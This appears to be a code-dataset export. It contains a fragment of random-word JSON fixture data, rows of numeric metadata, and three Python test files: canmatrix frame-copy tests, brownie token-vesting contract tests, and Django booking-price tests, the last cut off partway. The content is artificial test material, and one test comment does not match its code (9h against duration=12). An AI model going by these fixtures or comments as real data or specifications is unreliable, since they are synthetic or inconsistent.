hoe":-797146239,"bit":380261181.9263091,"fierce":"applied","passage":false,"paid":true,"sugar":"chamber","by":false,"suggest":false},1476111560.0083323,-1934686900,-268104772,"cotton","greatly",true,"complex",true,false,"traffic",-1072861369.857049],1250530523.1505895,"got","meet",1727055016.1805687,false,"asleep","original","funny",1264504857,-1793345555.6048331,"mathematics",1417829344.7583795,"valley","get",false,false,"numeral",false],"army":-814561918,"warm":"vowel","football":-211944206,"flew":"shown","known":-512448563,"musical":"lying","doing":"some","not":"example","grade":"sweet","hole":"where","difference":319845544,"vast":2095990079,"wait":-1358200618.8524513,"fresh":true,"fifteen":true,"weather":"eleven","numeral":false,"face":true,"cutting":false},true,"couple",904198024,"tea",true,-1292583679,-867280595.5645237,2025299353.5327177,false,"whom",2105012813,-1613166988,1598247982,false,false,false,false,true],"crack":true,"mark":false,"personal":-379627686.29684305,"shallow":false,"flat":267925739,"upon":"lot","occasionally":-190643355.90591526,"put":1648287491,"satellites":true,"arrive":true,"current":"stranger","paper":false,"here":true,"heart":"call","property":true,"you":true,"grabbed":-489715420.61424875,"chosen":true},1815759369,false,true,"strength","connected",778561562.6922975,811557121.7078152,"again",-104824769.20491838,true,false,true,false,"simple",true],"solar":-1153196500,"grabbed":"telephone","liquid":420972528,"famous":true,"once":"shot","can":-1809708958,"car":-1909578295.1774416,"take":"home","cent":1270816749.9329305,"essential":false,"newspaper":"mixture","whether":421857444,"cup":true,"across":"ride","correctly":264138807.6979313,"idea":true,"rock":455917578.784863,"mouse":"breathing"},"pour":726123409,"behavior":693372528.8339195,"fall":1566548696.7091346,"organized":717685753,"older":false,"condition":743647136,"pile":-267587881,"life":824924784.6123877,"topic":1300268575,"prepare":true,"younger":false,"rule":950344093,"minute":"mad","couple":"hollow","strong":"city"},"ear":true,"not":-590282226.5932918,"composition":"flight","office":-1755118502,"poor":"different","mail":-1127219757.167788,"push":-346793569,"practical":-107539334.1155572,"blow":true,"therefore":"send","arm":"complete","second":true,"fewer":-490507671.510715,"bring":"spent","seen":"wealth","effort":563832146.9645524,"whose":"trouble","needs":"tears","though":false},"avoid":-268541426.72947264,"grown":1340978945,"answer":true,"hidden":true,"program":"pie","drove":-2048544098.499269,"connected":-17859598,"daughter":"flew","now":false,"us":false,"dry":"fuel","office":"available","perfectly":false,"thought":false,"ocean":415805426,"private":true,"gold":2061060161,"nor":"officer","experience":-2079652264},"tell":"rather","lion":-1519874831.1412659,"continued":false,"gave":"root","green":"slave","afraid":"farther","been":true,"distant":2084210995,"coast":"farm","cage":-95753471.14638948,"diameter":1023244440,"chemical":982682670.4079657,"thumb":-110984318,"middle":-1492440423.7898378,"solar":"tell","plural":false,"seeing":1685599829},"straw":-337217046,"meet":true,"fifty":true,"parallel":true,"swing":"disease","lovely":"sport","lose":1798397736,"for":false,"bet":1968649350.4558558,"clothes":"gather","animal":true,"serious":false,"near":56714106.01041412,"uncle":"knew","square":858132366,"entire":"particles","immediately":"been","tight":false,"leather":"hill"},"park":-104461279.38594723,"battle":"during","ready":-1042339605,"seen":false,"wet":true,"throw":"growth","everybody":false,"table":34620308,"escape":897422213.5830412,"neighborhood":1202624059,"twelve":"sail","of":642071438,"famous":true,"animal":false,"hungry":"industry","made":true,"lunch":-1449536637.0398269,"pony":"power"},-1645265045,-1167645971.9001746,-1425583474.6966662,"atmosphere","cool","to",true,-88539330.69405508,"gun",true,-1006179778.9819007,false,150263187,"flight","no","score","curious"],-1585319192.672923,266558411,-119967391.43621397,"differ","hole",false,true,-1085748315.1468105,"money",false,-1222416556,-1292452888.6735067,-1301732942.9680037,true,false,true],"dinner":false,"east":true,"material":"center","include":"any","army":true,"fat":false,"led":-1769307036,"sugar":583844034,"disappear":true,"naturally":"mainly","molecular":-2133256227.106648,"shape":false,"tent":"smallest","sand":-1146328992,"fellow":-1439504051,"search":false,"again":-637065975.397129,"science":false,"exchange":-570613220.1083388},"shaking":1683111888.1853461,"above":-394691806.50876474,"mass":false,"recent":-1070309016.5627728,"attached":-1854288736.906733,"sang":1513491998,"wrong":false,"broken":-885406013,"all":false,"iron":1845035701.2311025,"mirror":true,"voice":"nearer","early":true,"condition":false,"bank":-264684432.19425678,"west":true,"late":"return","industrial":false},-530379412.2669134,true,-1048168168.2565804,"continent",true,"send",true,"mountain","rocky","worry",1037694027.5237236,"real","anything",false,"bound",false,"magnet",false],false,false,-1374350813,false,true,1714868623.7048535,true,"mood",1909886575,1820218127,-1752101903.3037448,1051590049,-941196318,false,-246571470.9200635,"laid",false,true,721274900.2753239],"question":true,"discover":false,"alone":"bridge","mostly":-657952415.409296,"police":"alphabet","recent":true,"lion":"stretch","buffalo":805394525.7574973,"street":false,"her":true,"trunk":false,"cabin":-120567505.19616032,"rhyme":-1651516516.5440774,"memory":"each"},"sent":"step","exactly":"solve","shaking":true,"prove":"page","build":"smaller","worth":"buy","limited":-1789792386,"try":true,"greatly":384237493,"will":false,"block":true,"plus":"sheet","cream":-1037934787.2098703,"these":"buffalo","air":771119747,"son":725003267.47191,"freedom":false,"factor":false,"goose":1881544973},"continent":true,"accept":true,"poetry":true,"appropriate":-692928029,"cover":-1081319175.4374657,"tin":194939169,"flies":"shade","people":"headed","tie":true,"must":false,"effort":false,"leg":false,"whistle":"pile","individual":"although","surrounded":"environment","wish":"obtain"},false,"unless","paint",true,false,"fine",710750926,"experiment",true,-1577912959.6179066,-1413554389,false,"soap"],"climb":false,"tail":"structure","sheep":true,"frame":true,"fallen":1299623413.9865928,"draw":false,"garage":false,"future":"hospital","cow":true,"daughter":"softly","protection":true,"rule":-1337663903,"thousand":true,"gravity":"middle","label":1818295042,"stone":-650875361.970201,"swept":826876375,"route":-1329404362,"tonight":true},"two":583378939,"sunlight":1213927809.5667634,"ride":true,"stairs":false,"even":"gas","salt":false,"worth":30557831,"label":-207652226.88967276,"topic":false,"pocket":false,"way":"substance","hand":true,"cloth":true,"check":"angle","raw":false,"steel":true,"truth":false,"sun":480736572.0902462,"plant":false},false,false,false,"funny",true,-1081900427,true,70536675,true,966385633,"than",true,false,465018592,false],"rising":"prepare","parallel":429813444,"page":-273386336.8468909,"applied":true,"almost":"attempt","skin":false,"rule":"these","lungs":-667800758.5816355,"circus":true,"thick":"alive","view":"equally","power":true,"brother":1151531715.5928974,"electric":1127627050,"plain":false,"led":"win","experience":"building","anything":false,"subject":"wherever"},"excellent":-2081696033.7993035,"bright":false,"perfectly":"bite","sets":"wrote","afraid":357742213,"six":533899870.3330002,"list":"when","baby":"jungle","lie":"information","court":"you","government":1976586907.2424355,"across":-990952789,"cattle":"appearance","variety":true,"thirty":1695547530.359095,"sum":"oldest","frozen":-1042164901.9974146,"aware":1108325452,"slow":true},"tobacco":-140084869.44667625,"fed":true,"pattern":-760589383,"degree":408023859.0804324,"simply":true,"consider":"still","tight":632434541.7473502,"weigh":true,"species":false,"should":"swimming","establish":"skill","command":"give","hidden":-1318036002.1722279,"label":false,"loud":true,"size":-1632309088.1154995,"map":"get","lesson":false},"sight":-1398158322,"city":true,"hurt":-682586464,"ever":false,"couple":-565841669,"brought":false,"purple":"chamber","planning":false,"dead":"slabs","carry":false,"stage":"cream","mistake":"ear","fur":"properly","mathematics":888538948.7946463,"enter":1200707662,"avoid":"island","push":799355087},true,false,"water",-34303541,"driver","atmosphere",false,"him","oil","rather","phrase","eager",true,-800354787.694756,"recall",1146710164.8092322,"character","begun","dug"],true,false,-751227274.2133703,"tiny",-1754520247,-1336216206,true,"onlinetools",true,true,true,false,false,-250429334.30336714,548431448.2958865,-2067589201.058012,"good",true,"corner"],"organized","for",-1381958358,false,false,399815737.7477684,-882697879.5922589,"box",true,"beginning",false,"already",true,false,"industrial",false],"bicycle":-864606082.7826753,"ill":43662767,"unit":"actually","result":1193311524,"lack":"rich","flower":false,"powerful":62044236.871985435,"consist":"correctly","natural":1509997381,"not":"think","political":"raise","mood":-1103299597.329041,"directly":1125057402,"smooth":1103005563,"basis":-1649311689,"treated":530221754,"has":true,"wonderful":-801375805},"spin",true,true,480840266.1832609,"education",true,"right",false,"composition",388121600.7616401,1868477097.6041813,"eye","thing",false,503359911,-1444911551],"so":"same","create":true,"most":-136560599.94131994,"ago":"perfect","am":"capital","leader":"instance","black":"why","expect":"go","evidence":"recent","stretch":false,"lead":false,"arrive":"nervous","buried":false,"soft":"fur","stick":true,"ate":"burst","we":"through","ball":false},"copper":"stepped","around":2085629114.905251,"pour":false,"very":"require","married":1808818122.1852398,"paint":false,"raise":"fellow","studying":-2124097257,"education":false,"office":true,"desert":836670701,"lay":true,"so":-1856588322.8771558,"command":"main","call":1168628903.7930942,"perhaps":"gasoline","such":467530880,"must":false,"crack":"fill"},true,"face",2000888579,-148516998.1103363,"involved",-1122121817.3460174,true,-199494034.33973885,true,"pipe","sudden",-981408420.8703756,"cowboy",-733260010.5195909,-2049158242.8893943,true,false,false,"disappear"],"breath":"weight","broad":"pale","pictured":"rice","small":false,"income":"mix","engine":false,"chest":true,"greater":1168195495.5659857,"plus":-1274493617,"search":1194915761.9967165,"manufacturing":"strange","tune":-2117156498,"accurate":-1466523764.7747269,"except":true,"any":-1961257374,"appropriate":-927009553,"gold":-957577346.6686292,"language":false},"help":953747666,"high":false,"slide":false,"imagine":false,"must":-915447507.5255203,"case":true,"hole":"fur","discover":true,"single":1632554614,"pleasure":-434399441.449296,"stage":1851557769.2615266,"mission":"writing","lady":"fallen","most":"children","pond":-534114630,"play":"unit","older":607185076},"cowboy":-1863411858,"wrong":false,"nearly":true,"seldom":false,"establish":-2116886876.9908333,"contrast":"face","taste":-1209787188.2747822,"down":"calm","equator":"smooth","silence":false,"nervous":143670969,"hardly":1816394710.939518,"stems":"population","pleasant":"naturally","production":1935649787.5607257,"provide":"slabs","shaking":245139209,"orange":false},"eaten","day","send",161877471,"next",false,true,-1290966614.5305748,"sense",true,"visit",-492605499,"found",false,1087031592],"visit",556460060.0225182,-985238899,false,"scientific",true,"brown",-721964123,"lower",true,true,true,"scientist","support","race",true,-250346404.46196556],"greatest",false,-1144078151.1516733,true,-1247041416,true,"short",814489580,"surrounded","worth",true,true,"me",true,true,-309054886.1594949,false,false],"article":false,"want":false,"middle":-283659483.7133665,"egg":"hold","took":true,"lower":"day","red":"particles","bill":652680028.4050326,"log":true,"track":true,"duty":-1974960422.7284803,"couple":431678212.57407,"south":true,"perfect":false,"cheese":"maybe"},"health":898330360,"was":true,"am":true,"land":-1106737697.3022633,"exercise":"previous","spell":56743312,"particles":"gravity","information":true,"those":484202829.6363735,"motor":true,"cheese":false,"box":-1961302811.5374422,"purple":true,"alive":"softly","were":"common","got":429023774.9485874,"written":false},"copper":"condition","every":386899277.347692,"chosen":true,"eye":-1312209511.901701,"came":49206155,"dress":false,"accept":true,"consist":1505231208,"hair":"circus","attempt":"correct","sugar":false,"has":"married","develop":"gulf","taught":-620769893,"double":true,"weak":-1801794359.844709,"larger":false,"spirit":false,"someone":1756757436},"relationship",false,"easily","felt",-1758608568,"person",false,false,350441022.900507,324433582,947561841.5923052,"birthday",1345777314.580439,false,true,-1558191070,471677614,true],"face",424408205,false,1763313378,true,false,-304811070,"graph","roof",false,-341387734.75949,"railroad","army","spent",false,false,-712546545.6518388],"part","system",446786836.3178463,-168108982.26115227,false,false,"fall",false,"general","gasoline",1206640902,1533461990.4236612,false,true,false,true,-1633846028.3841796,-1573041690.560811],"essential",false,1411189390.5953102,1631915403.8469539,201377500,false,false,"entirely",459501614.6137066,false,"occur",-700819672.6485529,-1237049206.2379847,"went","cross",false,"meat"],"activity":"suddenly","hurry":-338532041.14327717,"gate":"take","sink":"apart","fifty":true,"space":"other","believed":false,"must":"no","bee":"life","quickly":false,"hello":50267421.79676676,"instrument":"period","atmosphere":"frighten","art":true,"fifth":"ring","track":true,"sheep":"party","mix":440369016.8988075,"mill":1849152277},false,-1060131590,true,true,-907911199,1399782213,-1694700504,true,"edge",209406277.29649353,true,true,"available","show",1958555984,1662113192.2608953,false,-1604905104,"short"],"molecular":"any","daughter":false,"onto":-1929079815,"hardly":"cup","cabin":false,"history":"she","pine":"signal","including":717596710.8871946,"smoke":true,"private":1060758296.8837147,"brain":-1333125110,"pound":1795098876.5957823,"seven":1380878616,"seldom":true,"until":false,"corner":-1675594906,"gulf":-1261318337,"dear":false},"decide",1894529787.62789,"nails",true,false,false,"green","airplane",-555706113,false,"throat","broken","crowd","part",-726800416,-1540850121,false,"quick","nobody"],"drew":true,"grabbed":"simply","mixture":true,"eleven":true,"island":false,"labor":"several","indeed":"pair","concerned":true,"hungry":1078544309.245366,"arm":"therefore","tank":true,"fine":847906973,"sometime":false,"easier":true,"whenever":1906034605.871141},277439497.7626672,-81824614,"exist",-951045424,false,true,"kept","paragraph","his",true,"pig","collect","helpful",true,-1897532926,"introduced",true,1474235897.0485473],true,false,false,2084549468,true,300459309.18246937,"speak",false,"ruler",-1737935914.6369514,"drop",-707636097.6609683,true,false,"constantly",true,true,true,1174703969.0706406],false,-1151265133.697537,634911126,true,true,-1216709880,"fully","finally",true,true,1898345131.5029907,"captain",true,"group",-459511819,-1199545389.2367492,true,false],-1510857273.0313907,"stuck",true,"industrial","beneath",-1066238065.2408361,false,216682494,"silly",-1467360343.4135375,134542430.54658604,638374942.7544346,"teach",-760221252,"writer",false,-540393349.6669946,"somewhere"],-270925895,true,-1665204021.1886148,1462591703.5939574,true,false,"than","dance",false,false,false,917181587,true,false,true],false,"worried",true,-937999926,"cool",true,1402525093.159264,-1186925926.5012884,"football","am","baby",1176256760.5005922,true,false,-1521843931,false,-192709132,true],"word":2083704908,"negative":1267141050.7510304,"immediately":"tin","rear":true,"cell":-1526569414,"provide":false,"strength":false,"riding":true,"instance":-1006244220,"mark":"about","vowel":false,"cannot":false,"off":-2116701933},1152398223.1688929,true,14664233.283773422,false,"machine",-1286832594,555588589,true,false],"environment":"sand","settle":-1117727056.2359352,"bridge":430699288.45720387,"chicken":-1329769060.9838548,"already":"hello","continent":-493256965,"particularly":true,"positive":299099633,"tape":"rocky","chest":"saddle","completely":true,"control":2106068440.7036304,"happily":427164470.68725395,"fuel":-2062598673,"joy":206701087.0007081,"am":"clean","lower":-2068933067,"because":false},-1953215765.5146012,"lady","function",-727785813,"trail",true,1355635398.143846,true,"damage",true,177830161.25334835,"main","lower",false,807899141.6424298,false,true,505227994,false],"thing":true,"seed":899117266,"close":-945840995,"boat":"distant","ought":"caught","found":"planet","known":"wherever","sleep":false,"knowledge":"soon","fear":-61334086,"object":true,"learn":885776824,"fort":"anyway","cost":true,"toward":true,"victory":565345954},"over":1381527776.1778646,"sheep":"fourth","party":-1838321111,"whispered":"itself","manufacturing":"brown","nothing":true,"play":1730032144,"warm":"during","realize":"secret","positive":true,"shaking":401994364.7789221,"hour":"constantly","upper":"angry","second":false,"mistake":-1617903824,"pole":"hungry","dead":-113841901.2579751,"definition":false,"did":1946168231.2238941}'
| 979.5 | 26,962 | 0.748205 | 3,466 | 29,385 | 6.336988 | 0.616561 | 0.01548 | 0.006146 | 0.003187 | 0.015434 | 0.00346 | 0.00346 | 0 | 0 | 0 | 0 | 0.291135 | 0.007249 | 29,385 | 29 | 26,963 | 1,013.275862 | 0.461778 | 0.018581 | 0 | 0 | 0 | 0.625 | 0.992264 | 0.985291 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.125 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
a7a94f298fc986a8008b8e890785cf40abc614bb | 2,749 | py | Python | src/canmatrix/tests/test_copy.py | sky-dream/canmatrix | c5e17bc4fe42ce8ed8d67a3a9ef41a63509d9b6a | [
"BSD-2-Clause"
] | 1 | 2019-11-11T07:38:33.000Z | 2019-11-11T07:38:33.000Z | src/canmatrix/tests/test_copy.py | sky-dream/canmatrix | c5e17bc4fe42ce8ed8d67a3a9ef41a63509d9b6a | [
"BSD-2-Clause"
] | null | null | null | src/canmatrix/tests/test_copy.py | sky-dream/canmatrix | c5e17bc4fe42ce8ed8d67a3a9ef41a63509d9b6a | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import canmatrix.canmatrix
import canmatrix.copy
def test_merge():
matrix1 = canmatrix.canmatrix.CanMatrix()
frame1 = canmatrix.canmatrix.Frame("Frame1", arbitration_id=1)
frame1.add_signal(canmatrix.canmatrix.Signal("SomeSignal"))
matrix1.add_frame(frame1)
matrix2 = canmatrix.canmatrix.CanMatrix()
frame2 = canmatrix.canmatrix.Frame("Frame2", arbitration_id=2)
matrix2.add_frame(frame2)
matrix1.merge([matrix2])
assert len(matrix1.frames) == 2
def test_copy_ecu_with_frames():
matrix1 = canmatrix.canmatrix.CanMatrix()
frame1 = canmatrix.canmatrix.Frame("Frame1", arbitration_id=1)
frame1.add_signal(canmatrix.canmatrix.Signal("SomeSignal"))
matrix1.add_frame(frame1)
matrix2 = canmatrix.canmatrix.CanMatrix()
frame2 = canmatrix.canmatrix.Frame("Frame2", arbitration_id=2, transmitters= ["ECU"])
matrix2.add_frame(frame2)
matrix2.update_ecu_list()
canmatrix.copy.copy_ecu_with_frames("ECU", matrix2, matrix1)
assert len(matrix1.frames) == 2
assert len(matrix1.ecus) == 1
def test_copy_ecu_without_frames():
matrix1 = canmatrix.canmatrix.CanMatrix()
frame1 = canmatrix.canmatrix.Frame("Frame1", arbitration_id=1)
frame1.add_signal(canmatrix.canmatrix.Signal("SomeSignal"))
matrix1.add_frame(frame1)
matrix2 = canmatrix.canmatrix.CanMatrix()
frame2 = canmatrix.canmatrix.Frame("Frame2", arbitration_id=2, transmitters= ["ECU"])
matrix2.add_frame(frame2)
matrix2.update_ecu_list()
matrix2.add_ecu_defines("attrib", "STRING")
matrix2.ecu_by_name("ECU").add_attribute("attrib", "attribValue")
canmatrix.copy.copy_ecu("ECU", matrix2, matrix1)
assert len(matrix1.frames) == 1
assert len(matrix1.ecus) == 1
assert matrix1.ecu_by_name("ECU") is not None
def test_copy_ecu_with_attributes():
matrix1 = canmatrix.canmatrix.CanMatrix()
frame1 = canmatrix.canmatrix.Frame("Frame1", arbitration_id=1)
frame1.add_signal(canmatrix.canmatrix.Signal("SomeSignal"))
matrix1.add_frame(frame1)
matrix2 = canmatrix.canmatrix.CanMatrix()
frame2 = canmatrix.canmatrix.Frame("Frame2", arbitration_id=2, transmitters= ["ECU"])
matrix2.add_frame(frame2)
matrix2.update_ecu_list()
matrix2.add_ecu_defines("Node Address", "INT 0 255")
matrix2.add_ecu_defines("attrib", "STRING")
matrix2.ecu_by_name("ECU").add_attribute("attrib", "attribValue")
matrix2.ecu_by_name("ECU").add_attribute("Node Address", 42)
canmatrix.copy.copy_ecu("ECU", matrix2, matrix1)
assert len(matrix1.frames) == 1
assert len(matrix1.ecus) == 1
assert matrix1.ecu_by_name("ECU") is not None
assert matrix1.ecu_by_name("ECU").attribute("Node Address") == 42
| 35.24359 | 89 | 0.725355 | 342 | 2,749 | 5.640351 | 0.140351 | 0.270607 | 0.111975 | 0.037325 | 0.88647 | 0.844479 | 0.831519 | 0.795231 | 0.795231 | 0.795231 | 0 | 0.040203 | 0.140415 | 2,749 | 77 | 90 | 35.701299 | 0.776132 | 0.007639 | 0 | 0.789474 | 0 | 0 | 0.083272 | 0 | 0 | 0 | 0 | 0 | 0.175439 | 1 | 0.070175 | false | 0 | 0.035088 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ac0945859262e7ce41f506376067b0f634f032be | 7,685 | py | Python | tests/test_vesting.py | Buffer-Finance/Vesting-Contracts | 40c45a1e453545e1599b8e6488a3569fb1607749 | [
"MIT"
] | null | null | null | tests/test_vesting.py | Buffer-Finance/Vesting-Contracts | 40c45a1e453545e1599b8e6488a3569fb1607749 | [
"MIT"
] | null | null | null | tests/test_vesting.py | Buffer-Finance/Vesting-Contracts | 40c45a1e453545e1599b8e6488a3569fb1607749 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import pytest
import time
import brownie
def test_revoke_one_prevents_them_from_claiming(contracts, accounts, chain):
token_contract, vesting_contract = contracts
# set the periods in the contracts
days = 86400
months = 30 * days
periods = map(lambda x: x*months, range(11))
periods = list(periods)
percents = [5] + ([9.5] * 10)
percents = map(lambda x: int(x*1e4), percents)
percents = list(percents)
vesting_contract.setupVestingMode(periods, percents, {'from': accounts[0]})
users = accounts[1:3]
allocations = [(index+1) * 1000e18 for index, user in enumerate(users)]
allocations = map(lambda x: int(x), allocations)
allocations = list(allocations)
total_tokens = sum(allocations)
token_contract.approve(vesting_contract.address, total_tokens, {'from': accounts[0]})
vesting_contract.allotTokens(users, allocations, {'from': accounts[0]})
startTime = int(time.time())
vesting_contract.startVestingMode(startTime, {'from': accounts[0]})
# print("isVestingClaimable", vesting_contract.isVestingClaimable(1))
assert (False, 0) == vesting_contract.isVestingClaimable(0)
chain.sleep(10)
chain.mine(1)
vesting_length = vesting_contract.vestInfoLength()
def _claim(index):
print("index", index)
print("isVestingClaimable", vesting_contract.isVestingClaimable(index))
print("vestInfo", vesting_contract.vestInfo())
for user_id, user in enumerate(users):
user_initial_balance = token_contract.balanceOf(user)
contract_initial_balance = token_contract.balanceOf(vesting_contract)
vesting_contract.claimVestedTokens(index, {'from': user})
user_final_balance = token_contract.balanceOf(user)
contract_final_balance = token_contract.balanceOf(vesting_contract)
assert user_final_balance - user_initial_balance == contract_initial_balance - contract_final_balance
assert vesting_contract.tokensAlloted(user) == allocations[user_id]
for j in range(0, index+1):
# Should fail on reclaiming
with brownie.reverts("This vest amount is already claimed"):
vesting_contract.claimVestedTokens(j, {'from': user})
if index <= vesting_length - 2:
for j in range(index + 1, vesting_length):
with brownie.reverts("Not claimable at this time"):
vesting_contract.claimVestedTokens(j, {'from': user})
_, remaining_time = vesting_contract.isVestingClaimable(j)
assert months * (j-index) >= remaining_time
assert remaining_time > months * (j-index-1)
# for index in range(vesting_length):
_claim(0)
chain.mine(timedelta=months)
# revoke for 1st user
contract_initial_balance = token_contract.balanceOf(vesting_contract)
tokens_left = vesting_contract.tokensAlloted(users[0]) - vesting_contract.tokensClaimed(users[0])
vesting_contract.revoke(users[0], {'from': accounts[0]})
contract_final_balance = token_contract.balanceOf(vesting_contract)
assert tokens_left == contract_initial_balance - contract_final_balance
def test_setup_vesting(contracts, accounts, chain):
token_contract, vesting_contract = contracts
# set the periods in the contracts
days = 86400
months = 30 * days
periods = map(lambda x: x*months, range(11))
periods = list(periods)
percents = [5] + ([9.5] * 10)
percents = map(lambda x: int(x*1e4), percents)
percents = list(percents)
vesting_contract.setupVestingMode(periods, percents, {'from': accounts[0]})
users = accounts[1:3]
allocations = [(index+1) * 1000e18 for index, user in enumerate(users)]
allocations = map(lambda x: int(x), allocations)
allocations = list(allocations)
total_tokens = sum(allocations)
token_contract.approve(vesting_contract.address, total_tokens, {'from': accounts[0]})
vesting_contract.allotTokens(users, allocations, {'from': accounts[0]})
startTime = int(time.time())
vesting_contract.startVestingMode(startTime, {'from': accounts[0]})
# print("isVestingClaimable", vesting_contract.isVestingClaimable(1))
assert (False, 0) == vesting_contract.isVestingClaimable(0)
chain.sleep(10)
chain.mine(1)
vesting_length = vesting_contract.vestInfoLength()
def _claim(index):
print("index", index)
print("isVestingClaimable", vesting_contract.isVestingClaimable(index))
print("vestInfo", vesting_contract.vestInfo())
for user_id, user in enumerate(users):
user_initial_balance = token_contract.balanceOf(user)
contract_initial_balance = token_contract.balanceOf(vesting_contract)
vesting_contract.claimVestedTokens(index, {'from': user})
user_final_balance = token_contract.balanceOf(user)
contract_final_balance = token_contract.balanceOf(vesting_contract)
assert user_final_balance - user_initial_balance == contract_initial_balance - contract_final_balance
assert vesting_contract.tokensAlloted(user) == allocations[user_id]
for j in range(0, index+1):
# Should fail on reclaiming
with brownie.reverts("This vest amount is already claimed"):
vesting_contract.claimVestedTokens(j, {'from': user})
if index <= vesting_length - 2:
for j in range(index + 1, vesting_length):
with brownie.reverts("Not claimable at this time"):
vesting_contract.claimVestedTokens(j, {'from': user})
_, remaining_time = vesting_contract.isVestingClaimable(j)
assert months * (j-index) >= remaining_time
assert remaining_time > months * (j-index-1)
for index in range(vesting_length):
_claim(index)
chain.mine(timedelta=months)
# chain.mine(1)
# @pytest.mark.parametrize("idx", range(5))
# def test_sample(contracts, accounts):
# ibfr, vesting = contracts
# assert vesting.token() == ibfr.address
# def test_approve(token, accounts):
# token.approve(accounts[1], 10**19, {'from': accounts[0]})
# assert token.allowance(accounts[0], accounts[1]) == 10**19
# def test_modify_approve(token, accounts):
# token.approve(accounts[1], 10**19, {'from': accounts[0]})
# token.approve(accounts[1], 12345678, {'from': accounts[0]})
# assert token.allowance(accounts[0], accounts[1]) == 12345678
# def test_revoke_approve(token, accounts):
# token.approve(accounts[1], 10**19, {'from': accounts[0]})
# token.approve(accounts[1], 0, {'from': accounts[0]})
# assert token.allowance(accounts[0], accounts[1]) == 0
# def test_approve_self(token, accounts):
# token.approve(accounts[0], 10**19, {'from': accounts[0]})
# assert token.allowance(accounts[0], accounts[0]) == 10**19
# def test_only_affects_target(token, accounts):
# token.approve(accounts[1], 10**19, {'from': accounts[0]})
# assert token.allowance(accounts[1], accounts[0]) == 0
# def test_returns_true(token, accounts):
# tx = token.approve(accounts[1], 10**19, {'from': accounts[0]})
# assert tx.return_value is True
# def test_approval_event_fires(accounts, token):
# tx = token.approve(accounts[1], 10**19, {'from': accounts[0]})
# assert len(tx.events) == 1
# assert tx.events["Approval"].values() == [accounts[0], accounts[1], 10**19]
| 36.947115 | 113 | 0.662329 | 882 | 7,685 | 5.603175 | 0.141723 | 0.118373 | 0.047349 | 0.058681 | 0.866856 | 0.860178 | 0.846418 | 0.846418 | 0.846418 | 0.820923 | 0 | 0.029789 | 0.218087 | 7,685 | 207 | 114 | 37.125604 | 0.792644 | 0.235003 | 0 | 0.893204 | 0 | 0 | 0.041774 | 0 | 0 | 0 | 0 | 0 | 0.106796 | 1 | 0.038835 | false | 0 | 0.029126 | 0 | 0.067961 | 0.058252 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3bac93c5a13449522177bfe1e41215930ebb9974 | 27,537 | py | Python | booking/tests/test_models.py | bnico99/foruminternational | 8d577d3d929277b88d9c6deb1a77f90fb34ad469 | [
"BSD-3-Clause"
] | null | null | null | booking/tests/test_models.py | bnico99/foruminternational | 8d577d3d929277b88d9c6deb1a77f90fb34ad469 | [
"BSD-3-Clause"
] | 4 | 2021-04-08T21:11:19.000Z | 2021-06-10T19:40:34.000Z | booking/tests/test_models.py | bnico99/foruminternational | 8d577d3d929277b88d9c6deb1a77f90fb34ad469 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib.auth.models import User, AnonymousUser
from django.test import TestCase
from django.db import models
from booking.models import Event, Blocker, Booking
import datetime as dt
class TestModels(TestCase):
# Testing the case: # underWeek # Student # under50 # 3h# norefigerator # notoiletsneeded # expected outcome 20
def test_price1(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=3,
student='yes',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (20.0,))
# Testing the case: #underWeek # Student # under50 # 3h # refigerator# notoiletsneeded # expected outcome 20
def test_price2(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=3,
student='yes',
number_people=5,
refrigerator='yes',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (20.0,))
# Testing the case: # underWeek # Student # under50 # 6h # norefigerator # notoiletsneeded # expected outcome 40
def test_price3(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=6,
student='yes',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (40.0,))
# Testing the case: # underWeek # Student # under50 # 9h # norefigerator # toilets should always be needed # expected outcome 120
def test_price4(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=12,
student='yes',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (120.0,))
# Testing the case: # underWeek # Student # under50 # 6h # norefigerator # toilets needed because of starting time # expected outcome 80
def test_price5(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
